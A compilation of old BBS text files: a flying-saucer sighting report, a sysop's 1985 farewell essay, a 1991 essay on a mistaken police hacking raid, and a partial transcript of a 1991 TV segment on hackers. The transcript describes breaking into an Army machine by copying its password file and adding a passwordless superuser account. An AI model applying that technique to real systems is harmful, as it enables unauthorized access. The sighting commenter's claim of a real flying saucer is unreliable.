 Wilmot called Mrs. Wilmot's attention to it and both ran down into the yard
to watch. It was in sight less then a minute, perhaps 40 or 50 seconds,
Wilmot estimated.
 Wilmot said that it appeared to him to be about 1,500 feet high and going
fast. He estimated between 400 and 500 miles per hour.
 In appearance it looked oval in shape like two inverted saucers, faced mouth
to mouth, or like two old type washbowls placed, together in the same
fashion. The entire body glowed as though light were showing through from
inside, though not like it would inside, though not like it would be if a
light were merely underneath.
 From where he stood Wilmot said that the object looked to be about 5 feet in
size, and making allowance for the distance it was from town he  figured that
it must have been 15 to 20 feet in diameter, though this was just a guess.
 Wilmot said that he heard no sound but that Mrs. Wilmot said she heard a
swishing sound for a very short time.
 The object came into view from the southeast and disappeared over the
treetops in the general vicinity of six mile hill.
 Wilmot, who is one of the most respected and reliable citizens in town, kept
the story to himself hoping that someone else would come out and tell about
having seen one, but finally today decided that he would go ahead and tell
about it. The announcement that the RAAF was in possession of one came only a
few minutes after he decided to release the details of what he had seen.
-------------------------------------------------------------------------
 I gather from this record account that it was real flying saucer and could
not have been a weather related object or condition.Requiem for a Sysop

SUBMITTED BY:  Jim Anderson - SysOp MSB - Billings, MT

                   REQUIEM FOR A SYSOP
                   -------------------

    Excerpt from an article in "PC WEEK", Nov. 20, 1984:

    There may be no such thing as a free lunch, but there is an ample supply
of free software that's yours for the asking. All you have to do is dial up,
make a connection, browse through a couple of menus, check over long lists of
available software, make your choices and start downloading.

                   - + - + - + -

    Exchange of E-Mail between sysop and BBS user:

    Well, John, the good news is that the  faulty  file has been fixed but the
bad news is that your downloading privileges have been revoked. I just went
through the last two months of logs and came up with some interesting
statistics. During that time you have logged on 23 times, downloaded  66 files
and uploaded NONE. You have called for chat twice, and left a total of two
messages on the board, one requesting a specific program and the other
informing me of a disk error in a download file. I can only draw the
conclusion that you are interested in this board for ONE REASON ONLY -- to
rape hell out of the download menus. I've left plenty of messages regarding
PARTICIPATION in the BBS and the Message Base, but you either haven't read
them or else you ignored them. Sorry, but one-way streets just don't hack it
around here.         Jim.

    Jim, I have been taking part in the BBS. Every time I log on I read all
the new messages.    John.

    John, I just can't help but feel that in all that time you could have at
least said "Hi" or "Thanks for the downloads" or SOMETHING to acknowledge that
there's a real live human being on this end.        Jim.

                   - + - + - + -

    Except for power failures, my computer has been continually running since
Nov. 11, 1982, and has fielded over 12,000 telephone calls operating as a BBS.
Back then, it was a joy to be a part of the realm of computer
telecommunications -- now it's a drag. It seems to me that  a "GIMMEE"
attitude has pervaded the whole arena of BBSing, with callers interested in
nothing more than material gains in the way of software. My board is far from
the busiest, being isolated in the "foreign country" of Montana, but an
average day will see about 20 or 25 calls to the system. An average day will
also see about three or four messages (of ALL types, including E-Mail) being
posted. The typical log entry shows so-and-so logging on, going to the file
transfer area, downloading several files and then ,ogging off. Thanks, that's
why I started up a BBS, to supply people with free programs. Really makes my
day to see that I've spent all this time and money just to watch pigs at the
trough.

    Whatever happened to the COMMUNICATIONS in telecommunications?  Is this
the result of the Computer Age, that people don't talk or communicate with
each other? Are we getting so totally in tune with our equipment that we're
excluding PEOPLE? If so, then Orwell's predictions are tame in comparison with
the reality. Who took the BULLETIN BOARD out of Bulletin Board System?  The
file transfer section of my board is shiny from daily use, but the bulletin
section is obscured by cobwebs. The thought has crossed my mind more than once
just to load up a host program and let people grab whatever programs look
interesting.

    "Do you have a logon code for this system (Y/N) ==> Y <=="
    "What is your account number? 775"
    "What is your logon code? PASSWORD"
    "INVALID LOGON CODE"
    "Do you have a logon code for this system (Y/N) ==> Y <=="
    "What is your account number? 305"
    "What is your logon code? PASSWORD"

    et cetera, ad infinitum et ad nauseam.

    Hackers. Or so they'd like to believe. Vandals, pests, yes. Hackers? They
should be so talented, devoted and lucky. Why do these computerized
delinquents find such delight in trying to break into bulletin boards? Don't
they realize that sysops are ordinary people just like themselves trying to
find a little enjoyment in their hobby? Why pick on me? I'm spending a lot of
time and money trying to provide people a service for free, and they want to
go and spoil it for everyone. Heck, if they want onto the system, all they
have to do is apply for a logon. Why make life difficult for everyone? Leave
me alone. Go pick on CompuServe.

    Caller logs on. Leaves E-Mail to a friend. Lines only fill half the
screen, so he's probably using a Commodore 64. Goes to file transfer section,
and selects UltraTerm protocol. Chooses a file that indicates it's a TRS-80
program. BBS goes to send, he figures out that he's somewhere he doesn't want
to be and drops carrier.

    Another caller logs on four times in a row, but keeps losing carrier
before he can do anything. Probably phreaking on a cheapie phone service.

     Another caller successfully downloads a file. Sit. Wait. Wait some more.
System eventually times out and drops him.

     I'm not the most polite person in the world and I'm certainly not one to
stand on ceremony, but I am old enough to remember what manners were. They
also went down the tubes with "communications" and "bulletin boards." Whoops!
Dropped carrier! So what? If it's a halfway decent system, it'll reboot. Well,
I'll just go to bed while downloading this long file, the system will
eventually throw me off and reboot. Never mind that there's other people
wanting to call into the board. Who cares that the sysop climbs the walls when
he sees someone drop carrier or time-out on the system? Lately I've gotten
into the habit of dropping carrier ON MY END for the worst offenders. One good
hang-up deserves another.

     Along with all the other goodies that have bitten the dust, there's good
old APPRECIATION. As I mentioned before, my BBS has fielded over 12,000 calls.
Out of all of them, I have gotten maybe a dozen messages saying "Thanks for
running your BBS." That's about one "Thank You" per THOUSAND calls!
Unfortunately, it seems that people think they have all this automatically
coming to them. It's their right! Sorry to disillusion anyone, but that just
ain't so. The master switch for this system is two feet away, and I'm not so
decrepit that I can't hit it in a flash. Alternatively, I can ban anyone I
wish from my system. Callers use this BBS at my forbearance only, and it's not
a God-given right. It's a sysop-given privilege! I sincerely feel that we
should proclaim a "Sysop Appreciation Day." We certainly don't get any on a
day-to-day basis!

    Don't get me wrong. There ARE joys and benefits in running a BBS, although
sometimes in my nether moods I'm hard pressed to enumerate them. But the fact
is, there have been many occasions when I've rested my finger on the switch
with the idea of going offline forever.

    Now for the moral of the story. I'm only one sysop among many, and I'm not
trying to evoke sympathy for myself through this article. The point is that
almost every sysop around has these feelings to some extent or another. And
further, most of these sysops (especially the best and most devoted ones) are
going to reach a saturation point and wind up depriving the general public of
their services. I foresee a day coming, and very soon at that, when the high
quality BBS's will be all gone. So all this is really a plea for everyone to
shape up their acts before it's too late. If nothing else, when you're on a
bulletin board, leave a little message to the sysop. "Thanks for the use of
your system" or "Fine BBS you have here." Let them know they're appreciated.
When I see a message like that, I say to myself, "THAT's why I'm doing all
this!"  Sysops are real, live human beings with feelings and emotions. Let's
start treating them as such!

                   - + - + - + -

    EPILOGUE: Twelve hours after the above was written, I find out that one of
my best friends (with higher than normal access to the system) has allowed a
third party to use her logon. That's forbidden for anyone on my BBS to do, but
it hurts even more because a valued and trusted friend who should have known
better went and did it. That's the final straw. The Most Significant Byte BBS
is no longer in existence.

    Jim Anderson, Ex-Sysop
    The Most Significant Byte BBS
    Billings, Montana
    January 13, 1985

NOTE: I agree completely with Jim in his above comments, if not his action. I
find it difficult to comprehend the mind of individuals, who take those of us
who, through our generosity and good nature, are supplying them
this service. Please note, this attitude of SysOps is spreading and
BBS's around the country are disappearing or getting more difficult to access.
I certainly hope this action in tiny Billings, Montana has some effect on the
community of computerists. Don't abuse a good thing!

    Dave Williams, still SysOp
    Magic City RBBS
    Billings, MT
    January 13, 1985

NOTE: Even we here in faroff New Zealand are not immune to the above problems.
Most SysOps try hard to provide a good service. We're all human, though, so
expect the occasional problem. Let's hear it for the things we do right, for
a change. And PARTICIPATE. That's the key to making it work. The file may be
old, but its still relevant.

    Jeff Whiteside, Sysop
    The PORTAL
    Christchurch, New Zealand.

NOTE: OK, so I'm not an experienced SysOp of a large BBS, but I second that.
PARTICIPATION and COMMUNICATION are what it's all about. 

    Bernadette Mooney, new SysOp
    The Pinnacle Club
    Auckland, New Zealand.
    12 November 1989.

       A Case for Mistaken Identity... Who's Privacy was Really Invaded?

By Jim Bigeloww
SLO Bytes PCUG 

According to the San Luis Obispo County (California) Telegram-Tribune, dated  
Saturday, March 23, 1991, the San Luis Obispo Police raided the homes of two  
Cal Poly students and two other residents including one in Santa Margarita for  
alleged computer crimes, "hacking." The suspects had, through their computer  
modems, unknowingly tried to access a  computer owned by a group of local 
dermatologists. That same number had previously belonged to a popular local 
bulletin board, Cygnus XI. The police were alerted by the dermatologists and 
their computer technician who was afraid someone was trying to access their 
patient records. The police put a phone tap on the computer line for 10 days 
which showed over 200 calls placed to that number in one 24 hour period.  

Armed with a search warrant, police went to the house of the first suspect who 
later said he only called that number 3 times in a 24 hour period (I wonder who 
made the other 197 calls?).  Unfortunately he was not home... this cost him two 
broken doors as the police had to enter the house some way.  All computer 
equipment, disks and computer related equipment was "seized" and taken to 
police headquarters.  Follow-up articles reveal that the individual had not  
committed local crimes, that no charges would be filed and that the computers .
would be returned. Disks which were determined to contain illegally copied 
commercial software were to be turned over to Federal authorities.   
 
Like most personal home computer users I have interviewed, I didn't think much .
of this matter at first, but I am now becoming alarmed. I am a 64year old  
senior citizen, perhaps a paranoid senior.  I think most seniors are a bit  
paranoid. I am a strong supporter of law enforcement, an ex-peace officer, a  
retired parole agent, and as a senior I want law enforcement protection.
.
In this situation, according to the Tribune report, the police "had legitimate  
concern." But, apparently they didn't know what they were doing as the officer  
in charge stated "We are learning as we go."   
 
Accessing a modem is not easy. I, with five years of computer experience, find ?
it difficult and frustrating to set up  a computer and keep it operating, to  
understand a manual well enough to get the software to operate, to set the )
switches and jumpers on a modem, and then contact a BBS, and in the midst of  
their endless questions, coupled with my excitability and fumbling, answer them  
and get on line. I have many times tried to connect to BBS's only to be  
disconnected because I typed my name or code incorrectly. I have dialed wrong  
numbers and gotten a private phone.   
 
I do not want to be considered an enemy of law enforcement merely because I own  
a computer. I do not like to be called a "hacker," and especially because I  
contacted a BBS 3 times. The word, "hacker" originally applied to a computer  
user, now has become a dirty word. It implies criminality, a spy, double  
agents, espionage, stealing government secrets, stealing business codes, etc.  
Certainly, not that of a law abiding and law supporting, voting senior citizen,  
who has found a new hobby, a toy and a tool to occupy his mind. Computers are  
educational and can and do assist in providing community functions. I hope that  
the name "personal computer user" doesn't become a dirty word. 
 
The "hacker" problem seems to be viewed by law enforcement as one in which "we  
learn as we go." This is an extremely costly method as we blunder into a  
completely new era, that of computerization.  It causes conflicts between  
citizens and law enforcement. It is costly to citizens in that it causes great  
distress to us, to find ourselves possible enemies of the law, the loss of our  
computers and equipment, telephones and reputation by being publicly called  
hackers and criminals. It causes more problems when we attempt to regain our  
reputation and losses by suing the very agencies we have been so diligently  
supporting, for false arrest, confiscation of our most coveted possession and  
uninvited and forced entrance into our homes, causing great emotional  
disturbances (and older people are easily upset).   
 
I have a legal question I would like answered. Who is obligated in this  
incident: the owners and operators of Cygnus XI for failure to make a public  
announcement of the discontinuance of their services? or the phone company for  
issuing the number to a private corporation with a modem? the police for not  
knowing what they are doing? the computer user? It is not a problem of being  
more cautious, ethical, moral, lawabiding. It is a matter of citizen rights.    
 
The "hacker" problem now applies not only to code breakers, secret and document  
stealers, but to me, even in my first attempts to connect with a BBS. Had I  
tried to contact Cygnus XI my attempts would have put me under suspicion of the  
police and made me liable for arrest, confiscation of my computer, equipment,  
disks, and subsequent prosecution. I am more than a little bewildered.
 
And, am I becoming a paranoid senior citizen, not only because of criminals,  
but of the police also? Am I running a clandestine operation by merely owning a  
computer and a modem, or am I a solid senior citizen, which may well imply that  
I don't own "one of those computers?" Frankly, I don't know. Even though my  
computer is returned, and I am not arrested or prosecuted, I wonder what  
condition it now is in after all the rough handling. (Police who break down  
doors do not seem to be overly gentle, and computers and their hard disk drives  
are very fragile instruments). Just who and how many have scrutinized my  
computer? its contents?  and why? my personal home business transactions? and  
perhaps I supplement my income with the aid of my computer (I am a writer)? my  
daily journal? my most private and innermost thoughts? my letters? my daily  
activities? (This is exactly why personal computers and their programs were  
designed, for personal use. My personal computer is an extension of my self, my  
mind, and my personal affairs.)   
 
Can the police confiscate all my software claiming it is stolen, merely because  
they don't find the originals? (I, at the suggestion of the software companies,  
make backup copies of the original disks, and then place the originals  
elsewhere for safekeeping.) Do I need to keep all receipts to "prove" to the  
police that I am innocent of holding bootleg software? Is there a new twist in  
the laws that applies to personal computer users? 
 
Also any encoding of my documents or safeguarding them with a password, such as  
my daily journal, my diary, I have read in other cases, is viewed by law  
enforcement as an attempt to evade prosecution and virtually incriminates me.  
("If it wasn't criminal why did the "suspect" encode it?") 
 
This recent incident arouses complex emotions for me. What will the future  
bring for the home and personal computer user? I do not care to fear the  
police. I do not want to have to register my computer with the government. Will  
it come to that in our country? I do not want to have to maintain an impeccable  
record of all of my computer usages and activities, imports and exports, or to  
be connected to a state police monitoring facility, that at all times monitors  
my computer usage. The year "1984" is behind us. Let's keep it that way.    
 
This matter is a most serious problem and demands the attention of all  
citizens. As for myself, I wasn't the one involved, but I find it disturbing  
enough to cause me to learn of it and do something about it.   

                                      ###
    Transcript of _Now_It_Can_Be_Told_:  "Mad Hackers' Key Party"
              Hosted by Geraldo Rivera  (Sept. 30, 1991)

Geraldo:  I'm Geraldo rivera.  And now, It can be told.

<Flashy intro featuring various bleeps and sounds and what is supposed
to look like a computer screen>

Geraldo:  You're watching life imitate art.

<home video of hackers hacking.  Room is in disarray, with a few
computers scattered around among various wires and cables and
telephones, and other equipment.>

Geraldo:  Exclusive video of teenagers playing a dangerous and
mind-boggling version of War Games.

<video focuses on what appears to be 3 teenagers typing on computer
keyboards.>

<video focuses on one of the screens.>

Geraldo:  If you think it's kid stuff, just watch this.

<screen shows:
|     quit
| 221 Goodbye.
| rugrcx>
|        telnet tracer.army.mil
| Trying 192.33.5.135....
| Connected to tracer.army.mil
| Escape character is '^]'.
|
|
|
| Xenix K3-4 (tracer.army.mil)
|
|
|
| login:
|       dquayle
| Password:_
>
<screams of joy from kids>
<screen shows: Warning (banner)...This terminal is not secure...Do not
process classified information...Protect user IDs, passwords...Control
access to your system....Destroy classified and sensitive
material....>

Geraldo:  Straight into the US Army computer.  In the name of the vice
president!!  Straight out with America-s counter-terrorist strategies
in the Persian Gulf war. <video of bombings during Gulf War.)

Cliff Stoll:  These guys in the army, they didn't do their homework.
They screwed up.  <shows Cliff Stoll sitting in chair, terminal on
behind him.>

Geraldo:  You bet they did.  And they're not the only ones.

<more video of hackers hacking, Emmanuel Goldstein talking on a
telephone>

Geraldo:  Try the Pentagon, NASA, the White House.

<video showing guy next to payphone, Japanese Kanji characters fill
the screen>

Geraldo:  ...the IRS, the Department of Justice, and the stock
exchange.

<Japanese video now shows hacker typing on laptop in front of pay
phone - It is dark out.>

Phiber Optik (guy next to pay phone, typing on laptop):  I find it
very thrilling.  It's quite interesting.

Some guy in a suit speaking in a microphone:  Tomorrow's terrorists
may be able to more damage with a keyboard, than with a bomb.

<more video of a hacker hacking>

Geraldo:  Now it can be told.  A terrifying expose on Malice In
Wonderland.  The Mad Hacker's Key Party.

<screen displays that title over hacker typing on keyboard>
<Intro to the show>

Geraldo:  Welcome everybody.  Up front today, a new kind of warfare.
This kind of combat won't be fought with bombs and bullets, but with
bits and bytes, RAMs, and ROMs.  I'm talking about computer terrorism.
Imagine this nightmare:  Saddam Hussein breaking into our Pentagon
computers.  Well, as your about to see, we have discovered that this
is frightningly possible, given a combination of floppy disks and
sloppy security.  Before you meet a mad hacker, live, right here in
our studio, watch as our correspondant Krista Bradford discovers just
how vulnerable our national defense system really is.

<screen switches to Krista Bradford in corner office, in front of terminal>

Krista:  Thanks Geraldo.  Computers:  they are absolutely essential to
our national defense.  Our military depends on them to win wars and to
save lives.  So you'd think they'd do everything possible to protect
these computers, but, think again.  This exclusive video proves
otherwise.  <she hits play button on VCR, hacker home video pops up
again>

Krista:  This video looks like a home video, but its implications are
astounding.

<video passes over computer (IBM compat.) - notable is an issue of
2600 propped up against the keyboard>

Krista:  These kids are in Amsterdam; they are not the enemy, they are
not spies.  They are computer hackers and they are about to break into
a US Army computer.

Emmanuel:  This is about as blatant a violation as you can possibly
get.
<screen shows Emmanuel Goldstein>

Krista:  Emmanuel Goldstein is the editor of 2600, The Hacker Quarterly.
<screen switches to Emmanuel typing at keyboard, focuses on pile of 2600's
stacked nearby>

<screen switches back to hacker home video, Emmanuel on the phone>

Krista:  He was with the hackers as thy gained unauthorized access to
the Army computer.

<list of *.MIL sites scrolls across a computer screen>

Krista:  Although it wasn't classified, what the hackers found was
alarming.

<long e-mail message scrolls across a screen>

Krista:  A sensitive memo which details a counter-terrorist plan.
<screen shows bomb going off>  The date:  January 15th - Saddam
Hussein's deadline to withdraw his forces from Kuwait.  <more footage
from the Gulf War>

<screen switches to Emmanuel being interviewed again>

Emmanuel:  It was incredible how easy it was.  Because, literally they
picked a machine at random out of a thousand machines that they had a
listing of.  And used various means just to get in.

<screen switches to the screen I typed above, except the first login
is guest [Login incorrect]..Second login, sync, password prompt
appears?

Krista:  In order to get into a computer, you need to be an authorized
user, and have a password.  So the hackers had to create one.  Using a
well-known bug in the system, they managed to copy the password file
and do just that.

<list of /etc/passwd floats by>

Emmanuel:  <sitting at terminal>  The idea was to create a user named
Dan Quayle, and give him superuser privileges, as well he deserves.

Krista:  Now here's the trick:  because they didn't know any
legitimate passwords, they left the space for Dan Quayle's password
blank.

<screen focuses on dquayle record of /etc/passwd, highlights the
colons after 'dquayle'>

Emmanuel:  Everything between those two colon's is the encrypted
password, but there's nothing between those two colons, so there's no
password.

Krista:  Next, the hacker's call back as Dan Quayle, and now they
don't need a password to get in.

<screen shows login as dquayle, null password...Hackers cheer as
WARNING banner and logon screen (summarized above) appears.>

Krista:  At this point, all of about 5 minutes have passed.  A few
seconds later, and they have gained complete control.

Emmanuel:  That means they have access to the entire system, they
control the entire system.  They can take it down, they can change
every file.  They can read anybody's mail.

Krista:  <walking along outside>  So just how serious was this
violation?  Well, the Army, the Justice Department, and the FBI
wouldn't tell us.  They all refused to comment.  But this we do know:
the US Army computer that was accessed was designed for "Authorized
Use By Official Personnel Only".  You wouldn't want just anybody using
this computer, especially during a time of war.

<screen shows jet taking off...screen switches to guy ( Winn Schwartau
[Information Security Consultant])  sitting in front of terminal set
up with some other electronic devices attached.

Winn:  The military knows better.  They should be protective of their
computers a lot better than they are.

<helicopter shown...screen switches to Emmanuel>

Emmanuel:  Obviously, there's a problem.  Obviously people can get
into anything and see anything.

<screen switches to Cliff Stoll>

Cliff:  These guys in the Army, they didn't do their homework.  They
screwed up.

<switches back to video of hackers>

Krista:  They sure did.  This isn't the first time Dutch hackers have
infiltrated government computers.

<video of space shuttle taking off>

Krista:  Just this April, another group made its way into the
computers at NASA, the Pentagon, and other sensitive locations.
<screen shows newspaper headline of said event>.

<screen shows the Pentagon>

Emmanuel:  If our own military doesn't know enough to look for these
bugs and make it hard for people to get into their systems, what can
we say about non-classified computers or computers run by schools and
various other institutions?

<screen zooms in on hardback copy of _The_Cuckoo's_Egg>

Krista:  Cliff Stoll, author of The CUckoo's Egg:  How he tracked down
a hacker selling secrets to the KGB.  Stoll opposes hacking, likening
it to breaking into someone's house.

<screen shows cliff sitting in front of a Mac LC showing familiar
'Flying Toasters'....Cliff appears more sedate than as seen before on
other programs>

Cliff:  Is there good that can come from someone breaking into my
house?  If someone sneaks in through my window over there, comes in
and starts looking at things, is there any good that can come from
that?

<screen switches back to Emmanuel>

Emmanuel <with hand raised, looking mad at Cliff's comment>:  I don't
like that analogy.  Hackers are not interested in personal files of
individual people.  They're interested in huge databases and computer
systems.

<screen switches to Japanese TV, Kanji characters spread all
over...It's night...Guy is standing in front of lighted-up pay phone>

Phiber:  My handle's Phiber Optik.  I'm a computer hacker from the
east coast.

<screen shows Phiber taking acoustic coupler from a bag...[This scene looks
extremely modern-day Cyberpunk-ish]>

Krista:  The Dutch aren't the only ones breaking into US computers.

Phiber:  I find it actually very, very thrilling.  It's quite
interesting.

<screen shows laptop set on some cement stool....Screen moves to show
other people milling around...Gee, is that Mr. Goldstein?!?  And a
g-man looking type in sunglasses [

Krista:  It is nighttime in the meat packing district of New York
City.  A Japanese camera crew is documenting the work of one of
America's most notorious hackers.

<Phiber connects the coupler to the pay phone>

Phiber:  I enjoy this...Just know as much as you can about technology
and about, uh, computer networking.  <he's busy getting the pay phone
set up>

Krista:  They watch him hook up his computer to a payphone, so the
call can't be traced to his home.

Phiber:  <typing on the laptop>  Hacker's goal is basically to become
one with the machine.  [in a Socratic-dialogue tone of
voice]

Krista:  Unlike Holland, hacking in the US is a crime, so this hacker
prefers to remain anonymous.

<screen switches to dark bookstore where A. Hacker [Phiber] sits
across from Krista>

Krista:  So what gives you the right to access other people's
computers?

A. Hacker:  To tell you the truth, I really don't care hat someone
keeps on their computers.  Me, myself personally, and my close friends
are mainly interested in programming the machines.

Krista:  But if the machines are owned by somebody else, they're not
your machines!

A. Hacker:  Well, sure, but we'd just be coexisting with the people
that normally use the machine.

Krista:  Have you ever gotten into the White House computers?

A. Hacker:  Well, I can't personally say whether I have or not.  I
know it's certainly possible, there's nothing stopping anyone from it.

<shot of White House>

Krista:  Did you ever see anything interesting when you were there?

A. Hacker:  Well, I'm not gonna say I was ever there...bu...uhh...No
comment...

<screen switches back to the studio>

Geraldo:  Joining me now is Craig Neidorf. Craig is one of the
country's most notorious hackers.  He has the dubious distinction of
being one of the first people prosecuted under the Computer Abuse and
Fraud Act.  Although the charges against him were eventually dropped.

Geraldo:  Do you think it's fun what the Dutch kids did?  Get any
kicks out of it?

Craig [KL]:  I'm sure they probably thought it was fun.  I was a bit
disturbed by it  when I heard about it.

Geraldo:  Yeah.  And you'll see why, after this.

<cut away to commercial, but first a message from Winn Schwartau and
Geraldo...>

Winn:  We do, potentially face an electronic Pearl Harbor.

<shot of Pearl Harbor>

Geraldo:  Is the United States vulnerable to a computer invasion by
the enemy?  We'll be back in a moment with some of the scenarios for
terror, as we continue our report on the Mad Hacker's Key Party.

<Commercial>

Geraldo:  We'll be hearing more from our hacker friend here in a
moment, as well as from somebody who prosecutes guys just like Craig.

Geraldo:  In their own defense Craig and the other hackers say they
demonstrate graphically just how vulnerable are to sabotage.  Another
word for sabotage in the high-tech 90's is terrorism.  Here's Krista
Bradford with the second part of her alarming report.

Krista:  Thanks Geraldo.  For years the US government has known about
the threat of computer terrorism, but it has done little to protect
itself.  Computer security is routinely cut from the budget.  So now
we are in the precarious position of life possibly imitating art.
That according to a recent Congressional subcommitee, when the
subcomittee roled a clip from the movie Die Hard.

<actually it's Die Hard II...Clip shows scene where head hancho at
Dullus Airport realizes someone else has control of their computer
system>

<scene switches to that Winn guy...An Information Security Consultant>

Winn:  A dedicated, motivated group of individuals with proper funding
and a little bit of knowledge of technology.....

<another clip from Die Hard II...Workers scrambling around the control
tower..Chaos...>

Winn:  ....has the capability to effectively invade the United States
via his computers and communication systems, shut those systems down
that they wish to shut down, and do it invisibly by remote control.

<screen shows plane taking off>

Krista:  The FAA's computerized air traffic control system holds the
lives of tens of thousands of travellers in the balance every second.

<screen shows fictional computer graphic of air traffic over map of
the country>

Krista:  The federal reserve system moves $250 trillion through it's
computer networks every year.  The more computers we have the more
vulnerable we become to computer terrorism.

<shot of terrorists hijacking TWA plane>

Guy in suit in front of microphone:  A recent national research
council report says that the modern thief can steal more with a
computer, than with a gun.  Tomorrow's terrorists may be able to do
more damage with a keyboard, than with a bomb.  That's frightening.

Krista:  Dan Glickman (sp?) sits on the House Science, Space, and
Technology Committee and recently chaired a hearing on computer
security.  Winn Schartau, a leading authority on information security
and author of the novel _Terminal_Compromise_ testified at this
hearing.

Winn:  Terrorism is not necessarily implied by bombs and bullets.  You
can affect massive amounts of people by attacking the right computers.
And that's terrorism.

<switch back to Emmanuel>

Emmanuel:  The computer is a tool.  And any tool can be used as a
weapon.

<switch back to A. Hacker - now we see he's with another person (B.
hacker?)>

A. Hacker:  I wouldn't as much call it a weapon as I would call it an
extension of one's own mind.

<switch back to Winn.  He's setting up some sort of satellite receiver
next to his terminal and equipment>

Krista:  For the first time on television we can see just how
vulnerable computers are to attack.  There are four ways the computer
can be used as a weapon.  Number one, viruses:  programs that copy
themselves over and over again.  In January, there were 480 viruses
In June, 921.  At the current rate there will be 100,000 viruses by
the year 1995.

<shows fictional graphic of computers all over the map of the US,
apparently supposed to be infected>

Winn:  There are a new breed of viruses coming out that actually can
cause physical damage to the computer.  Either cause the monitor
itself to blow up, or cause the hard disk to physically crash, thus
rendering all the information unusable.

Krista:  Number 2, interception.  Terrorists can intercept phone lines
used by computers and faxes.  HIgh-tech phone taps.

<shows fictional graphic of guy at keyboard intercepting signals
transmitted between two computers>

Winn:  There are very, very simple, off-the-shelf, products and
techniques that are available to listen in on all your digital
communications.

Krista:  Number 3, electromagnetic eavesdropping.  Something our own
government has allegedly kept under wraps for 40 years, so it can
protect its military computers while spying on other unprotected
systems.

Winn:  You have to view the computer as a miniature radio transmitter.
All the information that is being processed on it, and is being
displayed on the terminal, your video display terminal, is being
broadcast into the air just like a radio transmitter.

Krista:  In an exclusive demonstration of just how easy it is while
someone is typing at a computer terminal we can see someone up else to
a mile and a half away tune in the radiation with an antenna and read
exactly what is being typed.

<screen shows one person typing in fictional credit card information,
then switches back to Winn's setup, where he tunes in to the frequency
19.9217 and is able to see on his terminal the information that was
being typed on the other terminal>

Krista:  And finally number 4, computer guns.  These guns are not
loaded with bullets but transmit high frequencies or electromagnetic
pulses, which, when fired, can cause an entire computer system to
crash.

<shows fictional graphic of satellite transmitting signal which causes
computer to blow up>

Winn:  What if I shot your computer with my hertz (sp? unclear word)
gun every hour on the hour, forcing your computers down every hour?
It takes approximately a half-hour to forty-five minutes to bring one
back up, how long can your company sustain that before you cry uncle?

<shows hacker home video again>

Krista:  Just how real is the threat of computer terrorism?  Real
enough, according to a GAO report on computer security at the
Department of Justice.  The report identified many disturbing computer
flaws which have life and death implications.

<shows report>

Krista:  Real enough according to another GAO report on computer
security at the stock market.  Six of our nation's stock market
computers are at risk, which handle 1.8 trillion dollars every year.

<shows stock market report>

Krista:  Real enough that according to a report just this September
which revealed that top secret bomb designs for every nuclear weapon
in the country were left unprotected in the computer system at the
Rocky Flats Nuclear Weapons Plant.

Winn:  The current state of affairs is such that we do potentially
face an electronic Pearl Harbor.

<bomb exploding footage>

Krista <in front of statue of statue in Washington, apparently>:  Just
how many acts of computer terrorism there have been is impossible to
say since our own government refuses to comment.  But, the manifesto
for the terrorist group The Red Brigade vows that one of its main
goals is to target and destroy computer systems.

<shot of Die Hard II again., where Bruce Willis says "This is just the
beginning">

<back to the studio...>

Geraldo:  Joining us now via satellite from Oakland, CA is the
Assistant District Attorney Don Ingraham ... for Alameda County and he
has been prosecuting computer hackers for years.

<Don is in the TV box, between Geraldo and Craig [KL]>

Geraldo:  Don, how do you respond to the feeling common among so many
hackers that what they're doing is a public service; they're exposing
the flaws in our security systems?

Don:  Right, and just like the people who rape a coed on campus are
exposing the flaws in our nation's higher education security.  It's
absolute nonsense.  They are doing nothing more than showing off to
each other, and satisfying their own appetite to know something that
is not theirs to know.

Geraldo:  Don, you stand by, Craig as well.  And when we come back
we'll hear more from prosecutor Ingraham and from, I guess his
archrival here, the Mad Hacker Craig Neidorf.

<Commercial>

Geraldo:  We're back with Craig Neidorf, a former University of
Missouri student who ran a widely distributed electronic newsletter
[Phrack, duh] for computer hackers.  He is so proud of being America's
Most Wanted computer hacker that he has put together this very
impressive scrapbook.

<Geraldo holds up a colorful scrapbook..On the left page shows a
lightning bolt hitting what looks to be a crown [Knight Lightning]
...And on the right it looks like a graphic saying "Knight Lightning"
and below that is  a black circle with a white lightning bolt, and
next to that is a triangle that looks very similar to the triangle
with an eye that appeared on the cover of _GURPS_Cyberpunk_ [which
said in it, the book that was seized by the Secret Service! see page
4...- but the one on KL is illegible]>

Geraldo:  Knight Lightning I guess that was your code?

KL:  It was my editor handle.

Geraldo:  That's your handle.  OK.  And from Oakland, CA we are
talking with the Assistant District Attorney Don Ingraham, who is hard
driven, you might say, to put people like Craig behind bars.  Don, do
you think Craig's lucky that he's not behind bars right now?

Don:  Yes, I think he's extraordinarily lucky.  He was part of a
conspiracy, in my opinion, to take property that wasn't his and share
it with others.  They charged him with interstate transport of stolen
property - couldn't make the threshold -and it came out that it had
been compromised by, unfortunately, released by another Bellcore
subsidiary.  But was certainly not through any doing of HIS that he is
a free man.

Geraldo:  So you think that his activities stink, then.

Don:  Absolutely.  No Question about it.

Geraldo:  Craig, you wanna respond?  Are you doing something for the
greater good of society?

KL:  Well I was merely publishing a newsletter.  I  didn't go out and
find this document.  Rather it was sent to me.  In many ways it could
be compared to Daniel Ellsberg sending the Pentagon Papers to the New
York Times.

Geraldo:  Do you figure it that way Don?  Is he like Daniel Ellsberg?

Don:  No, Ellsberg went to court to deal with it.  Daniel Ellsberg's
release of the Pentagon Papers is the subject of a published court
decision to point out it was a matter of national security and
national interest.  The E911 codes, which is the citizen's link to the
police department are not a matter of national security.  They're a
matter of the central service to the community.......

Geraldo:  You broke into the 911 system?  He broke into the 911
system!

KL:  No, that's not correct.  I never entered any 911 telephone
system.

Don:  I didn't say he entered into it.  What I said was that he and
Riggs conspired together to take a code that they knew was necessary
to 911 and to take it apart to see how it worked.  They never had the
owner's permission, they never asked for it.

Geraldo:  Alright, lemme ask you this....

KL:  The court found that there was no conspiracy here.

Geraldo:  You were acquitted.  You were vindicated at least from
criminal responsibility.  Lemme just quickly ask you this:  hackers
have been inside the White House computer.

KL:  Yes they have.

Geraldo:  And they've been inside the Pentagon computer.

KL:  Yes.

Geraldo:  And if Saddam Hussein hired some hackers whether they're
from Holland or any other place, he could've gotten into these
computers, presumably.

KL:  Presumably, he could've.

Geraldo:  And gotten some valuable information.

KL:  It's definitely possible.

Geraldo:  And you still think hackers are performing a public service?

KL:  That's not what I said.  I think that those kind of activities
are wrong.  But by the same token, the teenagers, or some of the
people here that are not performing malicious acts, while they should
be punished should not be published as extreme as the law currently
provides.

Geraldo:  You're response to that Don?

